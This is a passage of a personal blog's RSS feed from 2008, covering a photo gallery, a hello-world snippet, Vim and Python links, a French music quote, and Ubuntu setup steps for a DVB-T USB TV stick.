  6476. <a href="https://blog.x-way.org/images/handy-scaled-45.jpg"><img src="https://blog.x-way.org/images/handy-thumb-45.jpg" alt="handy-scaled-45.jpg"></a><br>
  6477.  
  6478. <a href="https://blog.x-way.org/images/handy-scaled-46.jpg"><img src="https://blog.x-way.org/images/handy-thumb-46.jpg" alt="handy-scaled-46.jpg"></a><br>
  6479.  
  6480. <a href="https://blog.x-way.org/images/handy-scaled-02.jpg"><img src="https://blog.x-way.org/images/handy-thumb-02.jpg" alt="handy-scaled-2.jpg"></a><br>
  6481.  
  6482. <a href="https://blog.x-way.org/images/handy-scaled-03.jpg"><img src="https://blog.x-way.org/images/handy-thumb-03.jpg" alt="handy-scaled-3.jpg"></a><br>
  6483.  
  6484. <a href="https://blog.x-way.org/images/handy-scaled-04.jpg"><img src="https://blog.x-way.org/images/handy-thumb-04.jpg" alt="handy-scaled-4.jpg"></a><br>
  6485.  
  6486. <a href="https://blog.x-way.org/images/handy-scaled-05.jpg"><img src="https://blog.x-way.org/images/handy-thumb-05.jpg" alt="handy-scaled-5.jpg"></a><br>
  6487.  
  6488. <a href="https://blog.x-way.org/images/handy-scaled-06.jpg"><img src="https://blog.x-way.org/images/handy-thumb-06.jpg" alt="handy-scaled-6.jpg"></a><br>
  6489.  
  6490. <a href="https://blog.x-way.org/images/handy-scaled-07.jpg"><img src="https://blog.x-way.org/images/handy-thumb-07.jpg" alt="handy-scaled-7.jpg"></a><br>
  6491.  
  6492. <a href="https://blog.x-way.org/images/handy-scaled-08.jpg"><img src="https://blog.x-way.org/images/handy-thumb-08.jpg" alt="handy-scaled-8.jpg"></a><br>
  6493.  
  6494. <a href="https://blog.x-way.org/images/handy-scaled-09.jpg"><img src="https://blog.x-way.org/images/handy-thumb-09.jpg" alt="handy-scaled-9.jpg"></a><br>
  6495.  
  6496. <a href="https://blog.x-way.org/images/handy-scaled-10.jpg"><img src="https://blog.x-way.org/images/handy-thumb-10.jpg" alt="handy-scaled-10.jpg"></a><br>
  6497.  
  6498. <a href="https://blog.x-way.org/images/handy-scaled-11.jpg"><img src="https://blog.x-way.org/images/handy-thumb-11.jpg" alt="handy-scaled-11.jpg"></a><br>
  6499.  
  6500. <a href="https://blog.x-way.org/images/handy-scaled-13.jpg"><img src="https://blog.x-way.org/images/handy-thumb-13.jpg" alt="handy-scaled-13.jpg"></a><br>
  6501.  
  6502. <a href="https://blog.x-way.org/images/handy-scaled-14.jpg"><img src="https://blog.x-way.org/images/handy-thumb-14.jpg" alt="handy-scaled-14.jpg"></a><br>
  6503.  
  6504. <a href="https://blog.x-way.org/images/handy-scaled-15.jpg"><img src="https://blog.x-way.org/images/handy-thumb-15.jpg" alt="handy-scaled-15.jpg"></a><br>
  6505.  
  6506. <a href="https://blog.x-way.org/images/handy-scaled-16.jpg"><img src="https://blog.x-way.org/images/handy-thumb-16.jpg" alt="handy-scaled-16.jpg"></a><br>
  6507.  
  6508. <a href="https://blog.x-way.org/images/handy-scaled-17.jpg"><img src="https://blog.x-way.org/images/handy-thumb-17.jpg" alt="handy-scaled-17.jpg"></a><br>
  6509.  
  6510. <a href="https://blog.x-way.org/images/handy-scaled-18.jpg"><img src="https://blog.x-way.org/images/handy-thumb-18.jpg" alt="handy-scaled-18.jpg"></a><br>
  6511.  
  6512. <a href="https://blog.x-way.org/images/handy-scaled-19.jpg"><img src="https://blog.x-way.org/images/handy-thumb-19.jpg" alt="handy-scaled-19.jpg"></a><br>
  6513.  
  6514. <a href="https://blog.x-way.org/images/handy-scaled-20.jpg"><img src="https://blog.x-way.org/images/handy-thumb-20.jpg" alt="handy-scaled-20.jpg"></a><br>
  6515.  
  6516. <a href="https://blog.x-way.org/images/handy-scaled-21.jpg"><img src="https://blog.x-way.org/images/handy-thumb-21.jpg" alt="handy-scaled-21.jpg"></a><br>
  6517.  
  6518. <a href="https://blog.x-way.org/images/handy-scaled-22.jpg"><img src="https://blog.x-way.org/images/handy-thumb-22.jpg" alt="handy-scaled-22.jpg"></a><br>
  6519.  
  6520. <a href="https://blog.x-way.org/images/handy-scaled-24.jpg"><img src="https://blog.x-way.org/images/handy-thumb-24.jpg" alt="handy-scaled-24.jpg"></a><br>
  6521.  
  6522. <a href="https://blog.x-way.org/images/handy-scaled-25.jpg"><img src="https://blog.x-way.org/images/handy-thumb-25.jpg" alt="handy-scaled-25.jpg"></a><br>
  6523.  
  6524. <a href="https://blog.x-way.org/images/handy-scaled-26.jpg"><img src="https://blog.x-way.org/images/handy-thumb-26.jpg" alt="handy-scaled-26.jpg"></a><br>
  6525.  
  6526. <a href="https://blog.x-way.org/images/handy-scaled-27.jpg"><img src="https://blog.x-way.org/images/handy-thumb-27.jpg" alt="handy-scaled-27.jpg"></a><br>
  6527.  
  6528. <a href="https://blog.x-way.org/images/handy-scaled-28.jpg"><img src="https://blog.x-way.org/images/handy-thumb-28.jpg" alt="handy-scaled-28.jpg"></a><br>
  6529.  
  6530. <a href="https://blog.x-way.org/images/handy-scaled-29.jpg"><img src="https://blog.x-way.org/images/handy-thumb-29.jpg" alt="handy-scaled-29.jpg"></a><br>
  6531.  
  6532. <a href="https://blog.x-way.org/images/handy-scaled-30.jpg"><img src="https://blog.x-way.org/images/handy-thumb-30.jpg" alt="handy-scaled-30.jpg"></a><br>
  6533.  
  6534. <a href="https://blog.x-way.org/images/handy-scaled-31.jpg"><img src="https://blog.x-way.org/images/handy-thumb-31.jpg" alt="handy-scaled-31.jpg"></a><br>
  6535.  
  6536. <a href="https://blog.x-way.org/images/handy-scaled-32.jpg"><img src="https://blog.x-way.org/images/handy-thumb-32.jpg" alt="handy-scaled-32.jpg"></a><br>
  6537.  
  6538. <a href="https://blog.x-way.org/images/handy-scaled-33.jpg"><img src="https://blog.x-way.org/images/handy-thumb-33.jpg" alt="handy-scaled-33.jpg"></a><br>
  6539.  
  6540. <a href="https://blog.x-way.org/images/handy-scaled-35.jpg"><img src="https://blog.x-way.org/images/handy-thumb-35.jpg" alt="handy-scaled-35.jpg"></a><br>
  6541.  
  6542. <a href="https://blog.x-way.org/images/handy-scaled-36.jpg"><img src="https://blog.x-way.org/images/handy-thumb-36.jpg" alt="handy-scaled-36.jpg"></a><br>
  6543.  
  6544. <a href="https://blog.x-way.org/images/handy-scaled-37.jpg"><img src="https://blog.x-way.org/images/handy-thumb-37.jpg" alt="handy-scaled-37.jpg"></a><br>
  6545.  
  6546. <a href="https://blog.x-way.org/images/handy-scaled-38.jpg"><img src="https://blog.x-way.org/images/handy-thumb-38.jpg" alt="handy-scaled-38.jpg"></a><br>
  6547.  
  6548. <a href="https://blog.x-way.org/images/handy-scaled-39.jpg"><img src="https://blog.x-way.org/images/handy-thumb-39.jpg" alt="handy-scaled-39.jpg"></a><br>
  6549.  
  6550. <a href="https://blog.x-way.org/images/handy-scaled-40.jpg"><img src="https://blog.x-way.org/images/handy-thumb-40.jpg" alt="handy-scaled-40.jpg"></a><br>
  6551.  
  6552. <a href="https://blog.x-way.org/images/handy-scaled-41.jpg"><img src="https://blog.x-way.org/images/handy-thumb-41.jpg" alt="handy-scaled-41.jpg"></a><br>
  6553. ]]></description>
  6554.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/handy-scaled-00.jpg"><img src="https://blog.x-way.org/images/handy-thumb-00.jpg" alt="handy-scaled-0.jpg"></a><br>
  6555.  
  6556. <a href="https://blog.x-way.org/images/handy-scaled-01.jpg"><img src="https://blog.x-way.org/images/handy-thumb-01.jpg" alt="handy-scaled-1.jpg"></a><br>
  6557.  
  6558. <a href="https://blog.x-way.org/images/handy-scaled-12.jpg"><img src="https://blog.x-way.org/images/handy-thumb-12.jpg" alt="handy-scaled-12.jpg"></a><br>
  6559.  
  6560. <a href="https://blog.x-way.org/images/handy-scaled-23.jpg"><img src="https://blog.x-way.org/images/handy-thumb-23.jpg" alt="handy-scaled-23.jpg"></a><br>
  6561.  
  6562. <a href="https://blog.x-way.org/images/handy-scaled-34.jpg"><img src="https://blog.x-way.org/images/handy-thumb-34.jpg" alt="handy-scaled-34.jpg"></a><br>
  6563.  
  6564. <a href="https://blog.x-way.org/images/handy-scaled-42.jpg"><img src="https://blog.x-way.org/images/handy-thumb-42.jpg" alt="handy-scaled-42.jpg"></a><br>
  6565.  
  6566. <a href="https://blog.x-way.org/images/handy-scaled-43.jpg"><img src="https://blog.x-way.org/images/handy-thumb-43.jpg" alt="handy-scaled-43.jpg"></a><br>
  6567.  
  6568. <a href="https://blog.x-way.org/images/handy-scaled-44.jpg"><img src="https://blog.x-way.org/images/handy-thumb-44.jpg" alt="handy-scaled-44.jpg"></a><br>
  6569.  
  6570. <a href="https://blog.x-way.org/images/handy-scaled-45.jpg"><img src="https://blog.x-way.org/images/handy-thumb-45.jpg" alt="handy-scaled-45.jpg"></a><br>
  6571.  
  6572. <a href="https://blog.x-way.org/images/handy-scaled-46.jpg"><img src="https://blog.x-way.org/images/handy-thumb-46.jpg" alt="handy-scaled-46.jpg"></a><br>
  6573.  
  6574. <a href="https://blog.x-way.org/images/handy-scaled-02.jpg"><img src="https://blog.x-way.org/images/handy-thumb-02.jpg" alt="handy-scaled-2.jpg"></a><br>
  6575.  
  6576. <a href="https://blog.x-way.org/images/handy-scaled-03.jpg"><img src="https://blog.x-way.org/images/handy-thumb-03.jpg" alt="handy-scaled-3.jpg"></a><br>
  6577.  
  6578. <a href="https://blog.x-way.org/images/handy-scaled-04.jpg"><img src="https://blog.x-way.org/images/handy-thumb-04.jpg" alt="handy-scaled-4.jpg"></a><br>
  6579.  
  6580. <a href="https://blog.x-way.org/images/handy-scaled-05.jpg"><img src="https://blog.x-way.org/images/handy-thumb-05.jpg" alt="handy-scaled-5.jpg"></a><br>
  6581.  
  6582. <a href="https://blog.x-way.org/images/handy-scaled-06.jpg"><img src="https://blog.x-way.org/images/handy-thumb-06.jpg" alt="handy-scaled-6.jpg"></a><br>
  6583.  
  6584. <a href="https://blog.x-way.org/images/handy-scaled-07.jpg"><img src="https://blog.x-way.org/images/handy-thumb-07.jpg" alt="handy-scaled-7.jpg"></a><br>
  6585.  
  6586. <a href="https://blog.x-way.org/images/handy-scaled-08.jpg"><img src="https://blog.x-way.org/images/handy-thumb-08.jpg" alt="handy-scaled-8.jpg"></a><br>
  6587.  
  6588. <a href="https://blog.x-way.org/images/handy-scaled-09.jpg"><img src="https://blog.x-way.org/images/handy-thumb-09.jpg" alt="handy-scaled-9.jpg"></a><br>
  6589.  
  6590. <a href="https://blog.x-way.org/images/handy-scaled-10.jpg"><img src="https://blog.x-way.org/images/handy-thumb-10.jpg" alt="handy-scaled-10.jpg"></a><br>
  6591.  
  6592. <a href="https://blog.x-way.org/images/handy-scaled-11.jpg"><img src="https://blog.x-way.org/images/handy-thumb-11.jpg" alt="handy-scaled-11.jpg"></a><br>
  6593.  
  6594. <a href="https://blog.x-way.org/images/handy-scaled-13.jpg"><img src="https://blog.x-way.org/images/handy-thumb-13.jpg" alt="handy-scaled-13.jpg"></a><br>
  6595.  
  6596. <a href="https://blog.x-way.org/images/handy-scaled-14.jpg"><img src="https://blog.x-way.org/images/handy-thumb-14.jpg" alt="handy-scaled-14.jpg"></a><br>
  6597.  
  6598. <a href="https://blog.x-way.org/images/handy-scaled-15.jpg"><img src="https://blog.x-way.org/images/handy-thumb-15.jpg" alt="handy-scaled-15.jpg"></a><br>
  6599.  
  6600. <a href="https://blog.x-way.org/images/handy-scaled-16.jpg"><img src="https://blog.x-way.org/images/handy-thumb-16.jpg" alt="handy-scaled-16.jpg"></a><br>
  6601.  
  6602. <a href="https://blog.x-way.org/images/handy-scaled-17.jpg"><img src="https://blog.x-way.org/images/handy-thumb-17.jpg" alt="handy-scaled-17.jpg"></a><br>
  6603.  
  6604. <a href="https://blog.x-way.org/images/handy-scaled-18.jpg"><img src="https://blog.x-way.org/images/handy-thumb-18.jpg" alt="handy-scaled-18.jpg"></a><br>
  6605.  
  6606. <a href="https://blog.x-way.org/images/handy-scaled-19.jpg"><img src="https://blog.x-way.org/images/handy-thumb-19.jpg" alt="handy-scaled-19.jpg"></a><br>
  6607.  
  6608. <a href="https://blog.x-way.org/images/handy-scaled-20.jpg"><img src="https://blog.x-way.org/images/handy-thumb-20.jpg" alt="handy-scaled-20.jpg"></a><br>
  6609.  
  6610. <a href="https://blog.x-way.org/images/handy-scaled-21.jpg"><img src="https://blog.x-way.org/images/handy-thumb-21.jpg" alt="handy-scaled-21.jpg"></a><br>
  6611.  
  6612. <a href="https://blog.x-way.org/images/handy-scaled-22.jpg"><img src="https://blog.x-way.org/images/handy-thumb-22.jpg" alt="handy-scaled-22.jpg"></a><br>
  6613.  
  6614. <a href="https://blog.x-way.org/images/handy-scaled-24.jpg"><img src="https://blog.x-way.org/images/handy-thumb-24.jpg" alt="handy-scaled-24.jpg"></a><br>
  6615.  
  6616. <a href="https://blog.x-way.org/images/handy-scaled-25.jpg"><img src="https://blog.x-way.org/images/handy-thumb-25.jpg" alt="handy-scaled-25.jpg"></a><br>
  6617.  
  6618. <a href="https://blog.x-way.org/images/handy-scaled-26.jpg"><img src="https://blog.x-way.org/images/handy-thumb-26.jpg" alt="handy-scaled-26.jpg"></a><br>
  6619.  
  6620. <a href="https://blog.x-way.org/images/handy-scaled-27.jpg"><img src="https://blog.x-way.org/images/handy-thumb-27.jpg" alt="handy-scaled-27.jpg"></a><br>
  6621.  
  6622. <a href="https://blog.x-way.org/images/handy-scaled-28.jpg"><img src="https://blog.x-way.org/images/handy-thumb-28.jpg" alt="handy-scaled-28.jpg"></a><br>
  6623.  
  6624. <a href="https://blog.x-way.org/images/handy-scaled-29.jpg"><img src="https://blog.x-way.org/images/handy-thumb-29.jpg" alt="handy-scaled-29.jpg"></a><br>
  6625.  
  6626. <a href="https://blog.x-way.org/images/handy-scaled-30.jpg"><img src="https://blog.x-way.org/images/handy-thumb-30.jpg" alt="handy-scaled-30.jpg"></a><br>
  6627.  
  6628. <a href="https://blog.x-way.org/images/handy-scaled-31.jpg"><img src="https://blog.x-way.org/images/handy-thumb-31.jpg" alt="handy-scaled-31.jpg"></a><br>
  6629.  
  6630. <a href="https://blog.x-way.org/images/handy-scaled-32.jpg"><img src="https://blog.x-way.org/images/handy-thumb-32.jpg" alt="handy-scaled-32.jpg"></a><br>
  6631.  
  6632. <a href="https://blog.x-way.org/images/handy-scaled-33.jpg"><img src="https://blog.x-way.org/images/handy-thumb-33.jpg" alt="handy-scaled-33.jpg"></a><br>
  6633.  
  6634. <a href="https://blog.x-way.org/images/handy-scaled-35.jpg"><img src="https://blog.x-way.org/images/handy-thumb-35.jpg" alt="handy-scaled-35.jpg"></a><br>
  6635.  
  6636. <a href="https://blog.x-way.org/images/handy-scaled-36.jpg"><img src="https://blog.x-way.org/images/handy-thumb-36.jpg" alt="handy-scaled-36.jpg"></a><br>
  6637.  
  6638. <a href="https://blog.x-way.org/images/handy-scaled-37.jpg"><img src="https://blog.x-way.org/images/handy-thumb-37.jpg" alt="handy-scaled-37.jpg"></a><br>
  6639.  
  6640. <a href="https://blog.x-way.org/images/handy-scaled-38.jpg"><img src="https://blog.x-way.org/images/handy-thumb-38.jpg" alt="handy-scaled-38.jpg"></a><br>
  6641.  
  6642. <a href="https://blog.x-way.org/images/handy-scaled-39.jpg"><img src="https://blog.x-way.org/images/handy-thumb-39.jpg" alt="handy-scaled-39.jpg"></a><br>
  6643.  
  6644. <a href="https://blog.x-way.org/images/handy-scaled-40.jpg"><img src="https://blog.x-way.org/images/handy-thumb-40.jpg" alt="handy-scaled-40.jpg"></a><br>
  6645.  
  6646. <a href="https://blog.x-way.org/images/handy-scaled-41.jpg"><img src="https://blog.x-way.org/images/handy-thumb-41.jpg" alt="handy-scaled-41.jpg"></a><br>
  6647. ]]></content:encoded>
  6648.  </item>
  6649.  
  6650.  <item>
  6651.    <title>helloworld.c</title>
  6652.    <link>https://blog.x-way.org/Coding/2008/06/25/helloworld-c.html</link>
  6653.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324135</guid>
  6654.    <dc:creator>Andreas Jaggi</dc:creator>
  6655.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6656.    <pubDate>Wed, 25 Jun 2008 21:40:00 +0000</pubDate>
  6657.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  6658.    <description><![CDATA[<pre>void main(){puts("Hello World.\n");}</pre>
  6659. ]]></description>
  6660.    <content:encoded><![CDATA[<pre>void main(){puts("Hello World.\n");}</pre>
  6661. ]]></content:encoded>
  6662.  </item>
  6663.  
  6664.  <item>
  6665.    <title>YYYYYEEEEESSSSSSSSSSSSSSSSSSS</title>
  6666.    <link>https://blog.x-way.org/Music/2008/05/09/YYYYYEEEEESSSSSSSSSSSSSSSSSSS.html</link>
  6667.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324134</guid>
  6668.    <dc:creator>Andreas Jaggi</dc:creator>
  6669.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6670.    <pubDate>Fri, 09 May 2008 17:52:00 +0000</pubDate>
  6671.    <category domain="https://blog.x-way.org/Music">Music</category>
  6672.    <description><![CDATA[<p><b>Qu'en est-il de Noir Désir?</b></p>
  6673.  
  6674. <blockquote cite="https://web.archive.org/web/20080512124828/http://www.lagruyere.ch/fr/le-journal/laculture/articles-2008/culture-08-05-08.html"><p>
  6675.  
  6676. On s'est remis au boulot. On projette d'enregistrer un album durant l'hiver prochain&hellip; C'est court, mais on a besoin d'une échéance pour se structurer.</p>
  6677.  
  6678. </blockquote>
  6679.  
  6680. <p>(<a href="https://web.archive.org/web/20080512124828/http://www.lagruyere.ch/fr/le-journal/laculture/articles-2008/culture-08-05-08.html">via</a>)</p>
  6681. ]]></description>
  6682.    <content:encoded><![CDATA[<p><b>Qu'en est-il de Noir Désir?</b></p>
  6683.  
  6684. <blockquote cite="https://web.archive.org/web/20080512124828/http://www.lagruyere.ch/fr/le-journal/laculture/articles-2008/culture-08-05-08.html"><p>
  6685.  
  6686. On s'est remis au boulot. On projette d'enregistrer un album durant l'hiver prochain&hellip; C'est court, mais on a besoin d'une échéance pour se structurer.</p>
  6687.  
  6688. </blockquote>
  6689.  
  6690. <p>(<a href="https://web.archive.org/web/20080512124828/http://www.lagruyere.ch/fr/le-journal/laculture/articles-2008/culture-08-05-08.html">via</a>)</p>
  6691. ]]></content:encoded>
  6692.  </item>
  6693.  
  6694.  <item>
  6695.    <title>Vim links</title>
  6696.    <link>https://blog.x-way.org/Linux/2008/05/04/Vim-links.html</link>
  6697.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324133</guid>
  6698.    <dc:creator>Andreas Jaggi</dc:creator>
  6699.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6700.    <pubDate>Sun, 04 May 2008 08:23:00 +0000</pubDate>
  6701.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6702.    <description><![CDATA[<ul>
  6703.  
  6704. <li><a href="https://web.archive.org/web/20080516033526/http://blog.objectmentor.com/articles/2008/04/30/vim-as-a-diff-merge-tool">VIM as a Diff/Merge Tool</a></li>
  6705.  
  6706. <li><a href="https://blog.x-way.org/stuff/10-easy-vim.pdf">10 Easy Steps to Becoming a Vim Expert</a></li>
  6707.  
  6708. <li><a href="https://web.archive.org/web/20080505051402/http://ifacethoughts.net/2008/05/02/vim-as-a-personal-wiki/">vim As A Personal Wiki</a></li>
  6709.  
  6710. </ul>
  6711. ]]></description>
  6712.    <content:encoded><![CDATA[<ul>
  6713.  
  6714. <li><a href="https://web.archive.org/web/20080516033526/http://blog.objectmentor.com/articles/2008/04/30/vim-as-a-diff-merge-tool">VIM as a Diff/Merge Tool</a></li>
  6715.  
  6716. <li><a href="https://blog.x-way.org/stuff/10-easy-vim.pdf">10 Easy Steps to Becoming a Vim Expert</a></li>
  6717.  
  6718. <li><a href="https://web.archive.org/web/20080505051402/http://ifacethoughts.net/2008/05/02/vim-as-a-personal-wiki/">vim As A Personal Wiki</a></li>
  6719.  
  6720. </ul>
  6721. ]]></content:encoded>
  6722.  </item>
  6723.  
  6724.  <item>
  6725.    <title>Sleep deprivation - Sat Rocks On The Second Floor</title>
  6726.    <link>https://blog.x-way.org/Misc/2008/05/02/Sleep-deprivation---Sat-Rocks-On-The-Second-Floor.html</link>
  6727.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324132</guid>
  6728.    <dc:creator>Andreas Jaggi</dc:creator>
  6729.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6730.    <pubDate>Fri, 02 May 2008 15:25:00 +0000</pubDate>
  6731.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6732.    <description><![CDATA[<p>Right after two nights with 4 hours of sleep in total (<a href="http://satellite.epfl.ch/special/0708/SatRocks/">Sat Rocks On The Second Floor!</a>), I stumble over this article: <a href="http://www.37signals.com/svn/posts/1006-sleep-deprivation-is-not-a-badge-of-honor">Sleep deprivation is not a badge of honor</a>. :-)</p>
  6733. ]]></description>
  6734.    <content:encoded><![CDATA[<p>Right after two nights with 4 hours of sleep in total (<a href="http://satellite.epfl.ch/special/0708/SatRocks/">Sat Rocks On The Second Floor!</a>), I stumble over this article: <a href="http://www.37signals.com/svn/posts/1006-sleep-deprivation-is-not-a-badge-of-honor">Sleep deprivation is not a badge of honor</a>. :-)</p>
  6735. ]]></content:encoded>
  6736.  </item>
  6737.  
  6738.  <item>
  6739.    <title>Seems people don't read enough books</title>
  6740.    <link>https://blog.x-way.org/Coding/2008/04/30/Seems-people-dont-read-enough-books.html</link>
  6741.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324131</guid>
  6742.    <dc:creator>Andreas Jaggi</dc:creator>
  6743.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6744.    <pubDate>Wed, 30 Apr 2008 14:23:00 +0000</pubDate>
  6745.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  6746.    <description><![CDATA[<p><a href="https://web.archive.org/web/20080502145952/http://www.codinghorror.com/blog/archives/001108.html">Coding Horror: Programmers Don't Read Books -- But You Should</a></p>
  6747. ]]></description>
  6748.    <content:encoded><![CDATA[<p><a href="https://web.archive.org/web/20080502145952/http://www.codinghorror.com/blog/archives/001108.html">Coding Horror: Programmers Don't Read Books -- But You Should</a></p>
  6749. ]]></content:encoded>
  6750.  </item>
  6751.  
  6752.  <item>
  6753.    <title>Gigabyte U7000 USB DTV DVB-T and Ubuntu (8.04)</title>
  6754.    <link>https://blog.x-way.org/Linux/2008/04/28/Gigabyte-U7000-USB-DTV-DVB-T-and-Ubuntu-804.html</link>
  6755.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324130</guid>
  6756.    <dc:creator>Andreas Jaggi</dc:creator>
  6757.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6758.    <pubDate>Mon, 28 Apr 2008 20:45:00 +0000</pubDate>
  6759.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6760.    <description><![CDATA[<ol>
  6761.  
  6762. <li><code>sudo apt-get install kaffeine dvb-utils mercurial linux-headers-$(uname -r) build-essential</code></li>
  6763.  
  6764. <li><code>hg clone http://linuxtv.org/hg/v4l-dvb</code></li>
  6765.  
  6766. <li><code>cd v4l-dvb</code></li>
  6767.  
  6768. <li><code>sudo make</code></li>
  6769.  
  6770. <li><code>sudo make install</code></li>
  6771.  
  6772. </ol>
  6773.  
  6774. <p>
  6775.  
  6776. If you're using another flavor of Linux or Ubuntu you may be missing the firmware file, you can get it <a href="http://files.waterwave.ch/dvb-usb-dib0700-1.10.fw">here</a>.
  6777.  
  6778. </p>
  6779.  
  6780. <img src="https://blog.x-way.org/images/dvb-t.png" height="288" width="512" alt="DVB-T screenshot">
  6781. ]]></description>
  6782.    <content:encoded><![CDATA[<ol>
  6783.  
  6784. <li><code>sudo apt-get install kaffeine dvb-utils mercurial linux-headers-$(uname -r) build-essential</code></li>
  6785.  
  6786. <li><code>hg clone http://linuxtv.org/hg/v4l-dvb</code></li>
  6787.  
  6788. <li><code>cd v4l-dvb</code></li>
  6789.  
  6790. <li><code>sudo make</code></li>
  6791.  
  6792. <li><code>sudo make install</code></li>
  6793.  
  6794. </ol>
  6795.  
  6796. <p>
  6797.  
  6798. If you're using another flavor of Linux or Ubuntu you may be missing the firmware file, you can get it <a href="http://files.waterwave.ch/dvb-usb-dib0700-1.10.fw">here</a>.
  6799.  
  6800. </p>
  6801.  
  6802. <img src="https://blog.x-way.org/images/dvb-t.png" height="288" width="512" alt="DVB-T screenshot">
  6803. ]]></content:encoded>
  6804.  </item>
  6805.  
  6806.  <item>
  6807.    <title>Musikverwaltung unter Linux</title>
  6808.    <link>https://blog.x-way.org/Linux/2008/04/28/Musikverwaltung-unter-Linux.html</link>
  6809.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324129</guid>
  6810.    <dc:creator>Andreas Jaggi</dc:creator>
  6811.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6812.    <pubDate>Mon, 28 Apr 2008 11:01:00 +0000</pubDate>
  6813.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6814.    <description><![CDATA[<a href="http://www.pro-linux.de/berichte/musikverwaltung.html">Pro-Linux: Musikverwaltung unter Linux, ein Vergleich verschiedener Programme</a>
  6815. ]]></description>
  6816.    <content:encoded><![CDATA[<a href="http://www.pro-linux.de/berichte/musikverwaltung.html">Pro-Linux: Musikverwaltung unter Linux, ein Vergleich verschiedener Programme</a>
  6817. ]]></content:encoded>
  6818.  </item>
  6819.  
  6820.  <item>
  6821.    <title>Python (S60) links</title>
  6822.    <link>https://blog.x-way.org/Coding/2008/04/23/Python-S60-links.html</link>
  6823.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324128</guid>
  6824.    <dc:creator>Andreas Jaggi</dc:creator>
  6825.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6826.    <pubDate>Wed, 23 Apr 2008 00:12:00 +0000</pubDate>
  6827.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  6828.    <description><![CDATA[<ul>
  6829.  
  6830. <li><a href="http://www.ibm.com/developerworks/aix/library/au-pythocli/?ca=dgr-lnxw06pythonunixtool&amp;S_TACT=105AGX59&amp;S_CMP=GR">Using Python to create UNIX command line tools</a></li>
  6831.  
  6832. <li><a href="http://sourceforge.net/projects/pys60-compat/">PyS60 Emulation Library</a>, unlike the Nokia Emulator, this one also works on Mac OS X and Linux!</li>
  6833.  
  6834. <li><a href="http://chris.berger.cx/PyS60/PyS60">Wlan Scanning module for PyS60</a>. There is also an extended GSM location module to get more information (Technology used, Name of Operator, Network Mode, &hellip;) than with the Nokia one.</li>
  6835.  
  6836. </ul>
  6837. ]]></description>
  6838.    <content:encoded><![CDATA[<ul>
  6839.  
  6840. <li><a href="http://www.ibm.com/developerworks/aix/library/au-pythocli/?ca=dgr-lnxw06pythonunixtool&amp;S_TACT=105AGX59&amp;S_CMP=GR">Using Python to create UNIX command line tools</a></li>
  6841.  
  6842. <li><a href="http://sourceforge.net/projects/pys60-compat/">PyS60 Emulation Library</a>, unlike the Nokia Emulator, this one also works on Mac OS X and Linux!</li>
  6843.  
  6844. <li><a href="http://chris.berger.cx/PyS60/PyS60">Wlan Scanning module for PyS60</a>. There is also an extended GSM location module to get more information (Technology used, Name of Operator, Network Mode, &hellip;) than with the Nokia one.</li>
  6845.  
  6846. </ul>
  6847. ]]></content:encoded>
  6848.  </item>
  6849.  
  6850.  <item>
  6851.    <title>ImageFlow</title>
  6852.    <link>https://blog.x-way.org/Webdesign/2008/04/21/ImageFlow.html</link>
  6853.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324127</guid>
  6854.    <dc:creator>Andreas Jaggi</dc:creator>
  6855.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6856.    <pubDate>Mon, 21 Apr 2008 21:31:00 +0000</pubDate>
  6857.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  6858.    <description><![CDATA[<p><a href="https://web.archive.org/web/20080430214454/http://194.95.111.244/~countzero/scripts/_myImageFlow/">ImageFlow</a>, CoverFlow mit JavaScript. (<a href="https://kniebes.com/2008/04/21/imageflow">via</a>)</p>
  6859. ]]></description>
  6860.    <content:encoded><![CDATA[<p><a href="https://web.archive.org/web/20080430214454/http://194.95.111.244/~countzero/scripts/_myImageFlow/">ImageFlow</a>, CoverFlow mit JavaScript. (<a href="https://kniebes.com/2008/04/21/imageflow">via</a>)</p>
  6861. ]]></content:encoded>
  6862.  </item>
  6863.  
  6864.  <item>
  6865.    <title>Mibbit.com - Web-IRC-Client</title>
  6866.    <link>https://blog.x-way.org/Networking/2008/04/21/Mibbit-com-Web-IRC-Client.html</link>
  6867.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324126</guid>
  6868.    <dc:creator>Andreas Jaggi</dc:creator>
  6869.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6870.    <pubDate>Mon, 21 Apr 2008 21:21:00 +0000</pubDate>
  6871.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  6872.    <description><![CDATA[<p><a href="http://www.mibbit.com/">Mibbit.com</a> provides an IRC webinterface, so you can hang around in your favorite channels with your iPhone/PDA/fridge/whatever.</p>
  6873. ]]></description>
